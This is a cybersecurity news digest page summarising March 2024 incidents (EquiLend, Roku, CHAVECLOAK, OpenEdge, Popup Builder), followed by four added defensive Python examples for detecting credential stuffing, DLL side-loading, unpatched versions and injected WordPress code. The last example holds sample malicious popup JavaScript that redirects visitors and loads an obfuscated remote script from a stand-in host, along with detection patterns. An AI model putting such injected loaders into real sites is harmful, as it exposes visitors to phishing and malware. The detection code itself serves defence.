Daily Brief
Find articles below, see 'DETAILS' for generated summaries
Total articles found: 11798
Checks for new stories every ~15 minutes
| Date | Source | Category | Title | Summary | Details |
|---|---|---|---|---|---|
| 2024-03-11 18:04:35 | bleepingcomputer | DATA BREACH | EquiLend Employee Data Compromised in Ransomware Attack | New York-based EquiLend Holdings suffered a ransomware attack in January 2024 that led to the theft of employee data. The financial technology firm took systems offline on January 22 to contain the intrusion and later confirmed it was a ransomware incident. Client services have resumed and there is no evidence that client data was exfiltrated, but employee personally identifiable information (PII) was stolen, including names, dates of birth, and Social Security numbers. The LockBit ransomware group claimed responsibility; EquiLend has not confirmed the attackers' identity. Affected employees are being offered two years of free identity theft protection through IDX. EquiLend, founded by major banks and broker-dealers, serves over 190 firms globally and facilitates transactions worth over $2.4 trillion monthly. | Details |
| 2024-03-11 17:49:05 | bleepingcomputer | DATA BREACH | Over 15,000 Roku Accounts Compromised, Sold for 50 Cents Each | Roku has confirmed a breach affecting 15,363 customer accounts, which were used to make unauthorized purchases. Stolen accounts were sold for $0.50 apiece, giving buyers access to the victims' stored payment methods. The accounts were taken over through credential stuffing: attackers replayed username and password pairs leaked in breaches of other services against Roku's login, so only users who reused passwords were affected. Once inside an account, attackers could change the password, email address, and shipping address, locking out the legitimate owner. Roku responded by securing the affected accounts, forcing password resets, and refunding unauthorized transactions. Roku has also drawn criticism for new "Dispute Resolution Terms" introduced around the same time, which users have linked to the fraudulent purchases. Roku does not currently offer two-factor authentication, which leaves accounts with reused passwords exposed to this kind of attack. | Details |
| 2024-03-11 14:55:33 | bleepingcomputer | CYBERCRIME | Fake Crypto Wallet App on Apple App Store Steals Digital Assets | A counterfeit version of the Leather cryptocurrency wallet on Apple's App Store is acting as a "wallet drainer," stealing users' digital assets. The authentic Leather project has warned its community that anyone who entered their wallet recovery passphrase into the fake app should immediately move their assets to a new, secure wallet, since whoever holds the passphrase controls the funds. Despite Leather's warnings and a report to Apple, the malicious app, published under the developer name 'LetalComRu,' remains available for download and carries a suspiciously high user rating. Victims have already reported losses, showing that the fake app is actively draining funds. The incident echoes earlier fake-wallet listings on the App Store and shows that scammers continue to get past Apple's review process. Users should install wallet apps only via links from the project's verified website, in this case leather.io. | Details |
| 2024-03-11 14:49:43 | thehackernews | MALWARE | New CHAVECLOAK Banking Trojan Targets Brazilian Financial Sector | A new banking trojan named CHAVECLOAK is targeting users in Brazil and is distributed through phishing emails carrying PDF attachments. The emails use contract-themed DocuSign lures; clicking the button in the PDF downloads the malware from a remote link. CHAVECLOAK is loaded through DLL side-loading: a legitimate executable, "Lightshot.exe", is made to load the malicious DLL, which then targets customers of Brazilian financial institutions. The trojan can block the victim's screen, log keystrokes, and display deceptive pop-ups to capture credentials, focusing on banks and cryptocurrency platforms such as Mercado Bitcoin. A Delphi variant of the malware has also been identified, continuing the trend of Delphi-based banking malware in Latin America. The threat illustrates the evolving landscape in the financial sector and parallels other campaigns, such as the mobile banking fraud campaign deploying the Copybara malware in Europe, where advanced evasion techniques, geofencing, and real-time remote interaction with infected devices show the growing sophistication of on-device fraud (ODF) schemes. | Details |
| 2024-03-11 14:49:43 | thehackernews | MISCELLANEOUS | Revolutionizing Privileged Access Management for Cloud Migration | One Identity PAM Essentials is a cloud-based Privileged Access Management solution designed to enhance security and manageability while ensuring compliance in cloud environments. The solution focuses on a user-centric and security-first design, simplifying privileged sessions and access controls, thus reducing the risk of unauthorized access and potential data breaches. PAM Essentials streamlines traditional PAM approaches by eliminating complexities and the need for additional infrastructure, leading to reduced operational costs and improved visibility into privileged activities. Its compliance features help organizations adhere to regulations, meet industry-specific standards, and satisfy cyber insurance requirements, all while being cost-effective. With cloud-native architecture, PAM Essentials supports scalability, flexibility, and remote access, ensuring seamless integration with existing cloud services for adaptive identity management. Native integration with OneLogin's access management solutions amplifies the capabilities of PAM Essentials, providing a holistic and seamless privileged access management experience. PAM Essentials is positioning itself to redefine the PAM market by offering a comprehensive cloud-native tool that addresses modern cybersecurity challenges and the evolving digital landscape. | Details |
| 2024-03-11 13:33:01 | theregister | CYBERCRIME | British Library's Recovery Hindered by Legacy IT After Ransomware Attack | The British Library is still struggling to recover from the Rhysida ransomware attack, which damaged servers and exfiltrated 600GB of data, and attributes much of the difficulty to its legacy IT estate. Ageing systems cannot be restored onto new infrastructure and lack vendor support, and the library's own report notes that its complex network allowed Rhysida to spread widely once inside. Legacy systems also relied on insecure, manual data-handling processes, which increased the volume of staff and customer data sitting exposed on the network. The library cites fiscal constraints: legal obligations diverted funds from IT modernization to mandatory archiving services, contributing to the outdated estate. Disruption continues to affect online access, on-site WiFi, and access to physical collections, while electronic resources and some research services remain offline. The library plans to move to cloud-based services over the next 18 months, judging them easier to manage despite the new security risks they bring. It is now rushing to build cybersecurity capacity, but faces constraints in team size, funding, and competitive pay for IT talent. Reallocated funds will accelerate the IT overhaul, with interim fixes now and a major upgrade phase over the next 18 months, compressing a budget that was originally spread over seven years. | Details |
| 2024-03-11 11:40:54 | thehackernews | MISCELLANEOUS | Refocusing Data Leakage Prevention for Cloud Environments | Traditional Data Leakage Prevention (DLP) solutions, built for on-premises IT infrastructure, now require adaptation to secure data in cloud-based environments. The effectiveness of on-premises DLP diminishes as corporate data increasingly resides online, necessitating a shift in data protection strategy. A new guide by LayerX, "On-Prem is Dead. Have You Adjusted Your Web DLP Plan?", outlines this transition and offers options for evolving DLP approaches. The guide suggests three possible paths: maintaining the status quo with traditional DLP, adopting Cloud Access Security Broker (CASB) DLP for SaaS application monitoring, or implementing Browser DLP for monitoring and policy enforcement in the browser itself. Browser DLP is recommended as the most effective option, using enterprise browser extensions to monitor user activity and website execution directly. Examples of browser DLP policies tailored to cloud environments illustrate practical measures to prevent unauthorized data exposure. IT and security professionals are encouraged to read the guide to better understand and implement DLP suited to the current cloud-centric landscape. | Details |
| 2024-03-11 11:20:17 | theregister | MISCELLANEOUS | ICO Seeks Feedback on 'Consent or Pay' Business Models | The UK Information Commissioner's Office (ICO) is consulting on "consent or pay" models, which offer users a choice between paying for a service or consenting to their data being used for advertising. The ICO has not named any company, but Meta's approach in the EU, which offers a choice between paying for ad-free services or allowing data processing for ads, is the best-known example. Privacy advocates have criticized these models, and several lawsuits under EU data protection law question their legality and whether the consent obtained is freely given. The ICO emphasizes clear consent and easy withdrawal of consent, in line with UK GDPR, which remains closely aligned with EU GDPR post-Brexit. The ICO highlights four key considerations: how fees should be calculated, whether the ad-funded and paid services are equivalent, the balance of power between provider and user, and whether users understand how their data is used. "Consent or pay" models are not prohibited by data protection law, but the ICO is assessing whether consent within them can meet the legal standard. Stakeholders can submit views to the ICO until April 17, 2024, as part of the open consultation. | Details |
| 2024-03-11 09:58:41 | thehackernews | MALWARE | BianLian Ransomware Exploits JetBrains Software Flaws | The BianLian ransomware group is exploiting vulnerabilities in JetBrains TeamCity to carry out extortion attacks. Analysis of a recent compromise showed that a TeamCity server was exploited for initial access and a Go-based backdoor was deployed. Since a free decryptor for BianLian was released in January 2023, the group has shifted to exfiltration-only extortion without encrypting files. After exploiting the TeamCity flaws, the attackers created new users and executed commands on the server to move laterally. BianLian's custom Go backdoor, tracked by Microsoft as BianDoor, failed to run, so the attackers fell back to a functionally equivalent PowerShell backdoor. That PowerShell backdoor, taken from a public GitHub repository, opens a TCP socket through which remote operators execute actions on the compromised host. Separately, a critical Atlassian Confluence vulnerability (CVE-2023-22527) is being exploited to deploy C3RB3R ransomware, cryptocurrency miners, and remote access trojans. Both cases show that newly disclosed flaws in internet-facing software are exploited in the wild quickly, which makes rapid patching and monitoring essential. | Details |
| 2024-03-11 06:29:53 | thehackernews | CYBERCRIME | Critical Flaw in OpenEdge Software Threatens Security | A critical vulnerability in Progress Software's OpenEdge Authentication Gateway and AdminServer can allow an attacker to bypass authentication. Tracked as CVE-2024-1403, the flaw carries the maximum CVSS score of 10.0. It affects multiple OpenEdge versions and stems from improper handling of unexpected types of usernames and passwords. Progress has released fixed versions 11.7.19, 12.2.14, and 12.8.1. Security firm Horizon3.ai has published a proof-of-concept exploit after reverse-engineering the affected AdminServer service; it shows that a specially crafted username can cause authentication to succeed incorrectly, giving unauthorized access. A further potential impact is remote deployment of new applications via WAR files, although that attack path is more complex. | Details |
| 2024-03-11 06:04:22 | thehackernews | CYBERCRIME | Magnet Goblin Exploits 1-Day Vulnerabilities with Nerbian RAT | Magnet Goblin, a financially motivated threat group, is exploiting one-day vulnerabilities (flaws that are already public but not yet widely patched) in edge devices and public-facing services. Active since at least January 2022, the group weaponizes new vulnerabilities quickly to infiltrate systems and deploy malware. Targeted products include Ivanti Connect Secure VPN, Magento, Qlik Sense, and possibly Apache ActiveMQ servers. After exploitation, Magnet Goblin deploys a cross-platform remote access trojan, Nerbian RAT, and a lighter variant, MiniNerbian, for command execution and data exfiltration. Both have largely evaded detection by running on edge devices, which typically lack endpoint monitoring. The group also uses the WARPWIRE JavaScript credential stealer, the Ligolo tunneling tool, and legitimate remote desktop software such as AnyDesk and ScreenConnect. The campaign underlines the need to secure every entry point, including those previously considered low risk. | Details |
| 2024-03-11 04:32:50 | theregister | CYBERCRIME | Microsoft's Delayed Response to Rootkit Exploit Patch | Microsoft took about six months to patch a Windows vulnerability that North Korea's Lazarus Group was actively exploiting. The flaw, in the IOCTL (I/O control) dispatcher of the AppLocker driver appid.sys, let an attacker who already had admin rights execute code in the kernel, which Lazarus used to install a rootkit. Avast researchers reported the exploit to Microsoft in August 2023, but the fix only shipped in the February 2024 Patch Tuesday. Microsoft has been criticized both for not prioritizing the bug and for not disclosing that it was being exploited when the patch was released. In other news, Apple released iOS updates fixing several critical vulnerabilities, some of them under active exploitation; the NSA and CISA published cloud security mitigation guidance; and a White House initiative with open-source organizations aims to offer infosec training and certifications to 250 Jordanian women. | Details |
| 2024-03-10 15:41:08 | bleepingcomputer | MALWARE | Over 3,300 WordPress Sites Infected by Popup Builder Plugin Flaw | Attackers have exploited a vulnerability in the Popup Builder plugin for WordPress to infect more than 3,300 websites with malicious code. The flaw, CVE-2023-6000, is a cross-site scripting (XSS) vulnerability affecting plugin versions 4.2.3 and earlier; it was first reported in November 2023. Although an earlier Balada Injector campaign abused the same flaw to infect roughly 6,700 sites, many administrators still have not applied the patch. The current attacks inject code into the plugin's Custom JavaScript or Custom CSS sections via the WordPress admin interface, which stores it in the wp_postmeta table of the database. The injected code registers as handlers for the plugin's popup events and fires when a popup opens or closes, mainly redirecting visitors to malicious sites including phishing pages and malware droppers. Sucuri recommends blocking the domains associated with the campaign and updating Popup Builder to the latest version, which fixes the vulnerability. With at least 80,000 sites still running vulnerable versions, further exploitation is likely. Cleaning an infected site means deleting the malicious entries from the database and then scanning for backdoors the attackers may have left behind. | Details |
| 2024-03-09 15:09:04 | bleepingcomputer | CYBERCRIME | Magnet Goblin Hackers Exploit 1-Day Flaws for Malware Deployment | A cybercriminal group named Magnet Goblin targets public-facing servers using 1-day vulnerabilities to install custom malware. The group exploits flaws quickly, sometimes just a day after proof-of-concept exploits are published. Targeted services include Ivanti Connect Secure, Apache ActiveMQ, ConnectWise ScreenConnect, Qlik Sense, and Magento. The group deploys the NerbianRAT and MiniNerbian malware variants and a custom JavaScript stealer on both Windows and Linux systems. Check Point analysts report that the Linux variant of NerbianRAT has been active since May 2022, collecting system information and communicating with command-and-control (C2) servers. Magnet Goblin's activity is hard to isolate because of the volume of 1-day exploitation that follows every vulnerability disclosure. Quick patching, network segmentation, endpoint protection, and multi-factor authentication are essential to mitigate the risk of similar exploits. | Details |
| 2024-03-09 04:08:37 | thehackernews | NATION STATE ACTIVITY | Microsoft Hit by Russian Hackers, Code and Secrets Compromised | Russian state-backed hackers tracked as Midnight Blizzard breached Microsoft's internal systems, accessing source code and potentially proprietary customer information. The intrusion was detected in January 2024 but began in November 2023 with a password spray attack against a legacy test account that lacked multi-factor authentication. Microsoft reports no evidence that customer-facing systems were compromised but has been contacting directly affected customers. The group increased the volume of its password spray attacks significantly in February, after an already large volume in January. Microsoft is escalating its security measures and investments in response to the sophisticated and persistent nature of Midnight Blizzard's operations. The threat actor, also known as APT29 or Cozy Bear, is associated with Russia's Foreign Intelligence Service (SVR) and is notorious for high-profile breaches including the SolarWinds supply-chain attack. The ongoing investigation aims to establish the full scope of the breach and to prevent further unauthorized access using the stolen information. | Details |
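The Roku item above describes credential stuffing followed by account takeover (password, email and shipping-address changes that lock the owner out). The following is an added example, not code from the article or from Roku, showing how a defender can spot both stages in an authentication log: a source that attempts logins to many distinct accounts in a short window, and successful logins from such a source that are quickly followed by lock-out style profile changes. The event format, field names, IP addresses and thresholds are this example's own assumptions.

```python
"""Detect credential-stuffing sources and follow-on account takeovers in a
constructed authentication/event log. Added example for the Roku item; the
log format, field names and thresholds are assumptions, not Roku's."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: (timestamp, source_ip, username, event, outcome).
# 203.0.113.5 replays leaked credentials against six accounts in seconds,
# then uses a successful login to change bob's password and shipping address.
SAMPLE_EVENTS = [
    ("2024-03-10T01:00:00", "203.0.113.5", "alice", "login", "fail"),
    ("2024-03-10T01:00:02", "203.0.113.5", "bob", "login", "ok"),
    ("2024-03-10T01:00:03", "203.0.113.5", "carol", "login", "fail"),
    ("2024-03-10T01:00:05", "203.0.113.5", "dave", "login", "ok"),
    ("2024-03-10T01:00:06", "203.0.113.5", "erin", "login", "fail"),
    ("2024-03-10T01:00:08", "203.0.113.5", "frank", "login", "fail"),
    ("2024-03-10T01:00:20", "203.0.113.5", "bob", "change_password", "ok"),
    ("2024-03-10T01:00:25", "203.0.113.5", "bob", "change_shipping_address", "ok"),
    ("2024-03-10T01:00:40", "203.0.113.5", "bob", "purchase", "ok"),
    ("2024-03-10T09:12:00", "198.51.100.7", "grace", "login", "fail"),
    ("2024-03-10T09:12:30", "198.51.100.7", "grace", "login", "ok"),
]

# Profile changes that lock the legitimate owner out (the article's ATO pattern).
SENSITIVE_CHANGES = {"change_password", "change_email", "change_shipping_address"}


def _parse(events):
    """Return events sorted by time with timestamps as datetime objects."""
    parsed = [(datetime.fromisoformat(ts), ip, user, ev, out)
              for ts, ip, user, ev, out in events]
    return sorted(parsed, key=lambda e: e[0])


def find_stuffing_sources(events, window=timedelta(minutes=10), min_accounts=5):
    """Flag source IPs that attempt logins to many *distinct* accounts within
    `window`. A user mistyping a password hits one account repeatedly; a
    credential-stuffing tool walks a leaked list, one try per account.
    Returns {ip: {"accounts": n, "attempts": n, "failures": n}} for the
    window with the most distinct accounts."""
    by_ip = defaultdict(list)
    for ts, ip, user, ev, out in _parse(events):
        if ev == "login":
            by_ip[ip].append((ts, user, out))

    flagged = {}
    for ip, logins in by_ip.items():
        start = 0
        for end in range(len(logins)):
            # Slide the window start forward until it spans at most `window`.
            while logins[end][0] - logins[start][0] > window:
                start += 1
            win = logins[start:end + 1]
            accounts = {user for _, user, _ in win}
            if len(accounts) >= min_accounts and \
                    len(accounts) > flagged.get(ip, {}).get("accounts", 0):
                flagged[ip] = {
                    "accounts": len(accounts),
                    "attempts": len(win),
                    "failures": sum(1 for _, _, out in win if out == "fail"),
                }
    return flagged


def find_takeovers(events, suspicious_ips, window=timedelta(minutes=30)):
    """For each successful login from a flagged source, list the lock-out style
    profile changes the same source made on that account within `window`."""
    parsed = _parse(events)
    hits = []
    for i, (ts, ip, user, ev, out) in enumerate(parsed):
        if ev != "login" or out != "ok" or ip not in suspicious_ips:
            continue
        changes = [ev2 for ts2, ip2, user2, ev2, out2 in parsed[i + 1:]
                   if ip2 == ip and user2 == user and out2 == "ok"
                   and ev2 in SENSITIVE_CHANGES and ts2 - ts <= window]
        if changes:
            hits.append((user, ip, changes))
    return hits


if __name__ == "__main__":
    sources = find_stuffing_sources(SAMPLE_EVENTS)
    print("credential-stuffing sources:", sources)
    print("likely takeovers:", find_takeovers(SAMPLE_EVENTS, set(sources)))
```

Per-IP thresholds are a starting point only; stuffing tools rotate through proxies, so in practice the same logic is also run per ASN or per device fingerprint, and the "many distinct accounts from one source" signal is the same one that exposes password spraying.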
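The CHAVECLOAK item above describes DLL side-loading: a legitimate executable (Lightshot.exe) is dropped next to a malicious DLL, which it loads instead of the real library. The following is an added example, not code from the article or from Fortinet, that triages Sysmon-style image-load records (Event ID 7 fields `Image`, `ImageLoaded`, `Signed`, `SignatureStatus`) for the pattern: an unsigned DLL loaded from the executable's own directory, a system DLL name resolved outside the Windows system directories, or a DLL living in a user-writable path. The records are constructed and the DLL name `Lightshot.dll` is an assumption, not a detail from the article.

```python
"""Triage Sysmon-style image-load events (Event ID 7) for DLL side-loading,
the technique the CHAVECLOAK item describes. Added example; the records are
constructed and 'Lightshot.dll' is an assumed name for the side-loaded DLL."""
import ntpath

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\")
USER_WRITABLE_HINTS = ("\\appdata\\", "\\temp\\", "\\downloads\\",
                       "\\programdata\\", "\\users\\public\\")
# Small subset of DLL names Windows normally resolves from System32 and that
# side-loading kits commonly impersonate.
KNOWN_SYSTEM_DLLS = {"version.dll", "dwmapi.dll", "cryptsp.dll", "wtsapi32.dll",
                     "userenv.dll", "msimg32.dll", "dbghelp.dll", "winmm.dll"}

# Constructed records using Sysmon Event ID 7 field names.
SAMPLE_IMAGE_LOADS = [
    {"Image": r"C:\Users\ana\AppData\Local\Temp\Lightshot.exe",
     "ImageLoaded": r"C:\Users\ana\AppData\Local\Temp\Lightshot.dll",  # assumed name
     "Signed": "false", "SignatureStatus": "Unavailable"},
    {"Image": r"C:\Program Files\Lightshot\Lightshot.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
    {"Image": r"C:\Users\ana\Downloads\setup.exe",
     "ImageLoaded": r"C:\Users\ana\Downloads\version.dll",
     "Signed": "false", "SignatureStatus": "Unavailable"},
]


def assess_image_load(rec):
    """Return the list of reasons an image-load record looks like side-loading
    (an empty list means nothing suspicious)."""
    image = rec["Image"].lower()
    dll = rec["ImageLoaded"].lower()
    dll_dir, dll_name = ntpath.split(dll)
    signed_ok = (rec.get("Signed", "false").lower() == "true"
                 and rec.get("SignatureStatus", "").lower() == "valid")
    in_system_dir = dll.startswith(SYSTEM_DIRS)

    if in_system_dir and signed_ok:
        return []  # the normal case: a validly signed DLL from System32/SysWOW64

    reasons = []
    if not signed_ok and not in_system_dir and dll_dir == ntpath.dirname(image):
        reasons.append("unsigned DLL loaded from the executable's own directory")
    if dll_name in KNOWN_SYSTEM_DLLS and not in_system_dir:
        reasons.append(f"{dll_name} resolved outside the Windows system directories")
    if any(hint in dll_dir + "\\" for hint in USER_WRITABLE_HINTS):
        reasons.append("DLL resides in a user-writable location")
    return reasons


def scan_image_loads(records):
    """Return (dll_path, reasons) for every record with at least one reason."""
    results = []
    for rec in records:
        reasons = assess_image_load(rec)
        if reasons:
            results.append((rec["ImageLoaded"], reasons))
    return results


if __name__ == "__main__":
    for path, reasons in scan_image_loads(SAMPLE_IMAGE_LOADS):
        print(path)
        for reason in reasons:
            print("  -", reason)
```

The "user-writable location" reason on its own is weak (plenty of legitimate software installs under AppData), so it is meant to raise the score of a hit rather than to page anyone by itself; the combination of a signed, well-known executable loading an unsigned DLL from the same temporary directory is the part worth alerting on.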
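The OpenEdge item above names the fixed releases for CVE-2024-1403 (11.7.19, 12.2.14 and 12.8.1), which means the first practical step is mapping an inventory of version strings onto those branches. The following is an added example, not code from Progress or from the article, that does that mapping and deliberately reports versions on branches the advisory does not mention as "no fix listed" rather than "fixed". The hostnames and version strings are constructed.

```python
"""Check OpenEdge version strings against the fixed releases named for
CVE-2024-1403 (11.7.19, 12.2.14, 12.8.1). Added example; inventory data is
constructed and the branch handling is this example's own logic."""
import re

# Fixed patch level per maintained branch, from the advisory summary.
FIXED_FOR_CVE_2024_1403 = {(11, 7): 19, (12, 2): 14, (12, 8): 1}

_VERSION_RE = re.compile(r"^\s*(\d+)\.(\d+)(?:\.(\d+))?")


def parse_openedge_version(text):
    """Return (major, minor, patch) from strings like '12.2.13', '12.8' or
    '11.7.18 PLUS'; trailing tokens are ignored and a missing patch level is
    treated as 0. Raises ValueError for anything that is not a version."""
    m = _VERSION_RE.match(text)
    if not m:
        raise ValueError(f"not an OpenEdge version: {text!r}")
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)


def cve_2024_1403_status(text):
    """Classify a version as 'fixed', 'vulnerable' or 'no fix listed'.
    A branch the advisory does not name is NOT assumed safe: it has no fixed
    release to move to, so the host needs an upgrade to a fixed branch."""
    major, minor, patch = parse_openedge_version(text)
    fixed_patch = FIXED_FOR_CVE_2024_1403.get((major, minor))
    if fixed_patch is None:
        return "no fix listed"
    return "fixed" if patch >= fixed_patch else "vulnerable"


def triage_inventory(inventory):
    """inventory: {hostname: version string} -> {hostname: status}."""
    return {host: cve_2024_1403_status(ver) for host, ver in inventory.items()}


if __name__ == "__main__":
    sample = {  # constructed inventory
        "oe-prod-1": "12.2.13",
        "oe-prod-2": "12.2.14",
        "oe-dev": "12.8",
        "oe-legacy": "11.7.18 PLUS",
        "oe-test": "12.5.0",
    }
    for host, status in triage_inventory(sample).items():
        print(f"{host:10} {sample[host]:14} {status}")
```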
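The Popup Builder item above explains that the injected code lives in the plugin's Custom JavaScript/CSS settings, stored in the wp_postmeta table, and runs as a handler on popup events to redirect visitors. The following is an added example, not code from Sucuri or from the plugin, that scans exported wp_postmeta rows for the usual markers of such an injection: a remote script include, dynamic script creation, a visitor redirect, or an obfuscated payload. The rows, the `sg_popup*` meta_key names, the `sgpbWillOpen`/`sgpbDidOpen` style event names and the domains are constructed or assumed for the example; a real cleanup would export the rows with a query against the site's own database and check the keys the installed plugin version actually uses.

```python
"""Scan wp_postmeta rows for injected Popup Builder custom JS/CSS, the
infection the Sucuri item describes. Added example; rows, meta_key names,
domains and event names are constructed/assumed, not Sucuri's data."""
import re

# Ordered list so the reasons come out deterministically.
SUSPECT_PATTERNS = [
    ("remote script include",
     re.compile(r"<script[^>]+src\s*=\s*[\"']https?://", re.I)),
    ("dynamic script injection",
     re.compile(r"createElement\s*\(\s*[\"']script[\"']", re.I)),
    ("redirect of visitor",
     re.compile(r"\b(?:window\.|top\.|document\.)?location"
                r"(?:\.href|\.replace|\.assign)?\s*(?:=|\()", re.I)),
    ("obfuscated payload",
     re.compile(r"\b(?:eval|atob|unescape)\s*\(|fromCharCode", re.I)),
    ("hooked to a popup event",  # assumed event names: sgpbWillOpen, sgpbDidOpen, ...
     re.compile(r"\bsgpb(?:Will|Did)(?:Open|Close)\b")),
]

# Only rows that belong to the plugin are scanned; the key names are assumptions.
PLUGIN_KEY_HINTS = ("sg_popup", "sgpb")

# Constructed rows: (meta_id, post_id, meta_key, meta_value)
SAMPLE_POSTMETA = [
    (101, 17, "sg_popup_custom_css", ".sgpb-popup{border:1px solid #ccc}"),
    (102, 17, "sg_popup_custom_js",
     "jQuery(window).on('sgpbDidOpen', function(){ "
     "window.location.href='https://redirect.example/land'; });"),
    (103, 18, "_edit_lock", "1710000000:1"),
    (104, 18, "sg_popup_custom_js",
     "var s=document.createElement('script');"
     "s.src=atob('aHR0cHM6Ly9iYWQuZXhhbXBsZS9sb2FkZXIuanM=');"
     "document.head.appendChild(s);"),
    (105, 19, "sg_popup_custom_js", "console.log('popup opened');"),
]


def classify_value(value):
    """Return the names of every suspect pattern found in a custom JS/CSS value."""
    return [name for name, rx in SUSPECT_PATTERNS if rx.search(value)]


def scan_postmeta(rows):
    """Return {meta_id: (post_id, reasons)} for plugin rows whose value matches
    at least one pattern other than the event hook alone: a handler that
    merely logs something is legitimate customization, not an infection."""
    flagged = {}
    for meta_id, post_id, meta_key, meta_value in rows:
        if not any(hint in meta_key.lower() for hint in PLUGIN_KEY_HINTS):
            continue
        reasons = classify_value(meta_value)
        if any(reason != "hooked to a popup event" for reason in reasons):
            flagged[meta_id] = (post_id, reasons)
    return flagged


if __name__ == "__main__":
    for meta_id, (post_id, reasons) in scan_postmeta(SAMPLE_POSTMETA).items():
        print(f"wp_postmeta.meta_id={meta_id} (post {post_id}): {', '.join(reasons)}")
```

Flagged meta_ids are the rows to delete (or to restore from a known-good backup); as the item notes, removal is only half the job, because the same admin access used to plant the handler can also have dropped a backdoor elsewhere in the site, so a file-level scan and a plugin update to a version above 4.2.3 must follow.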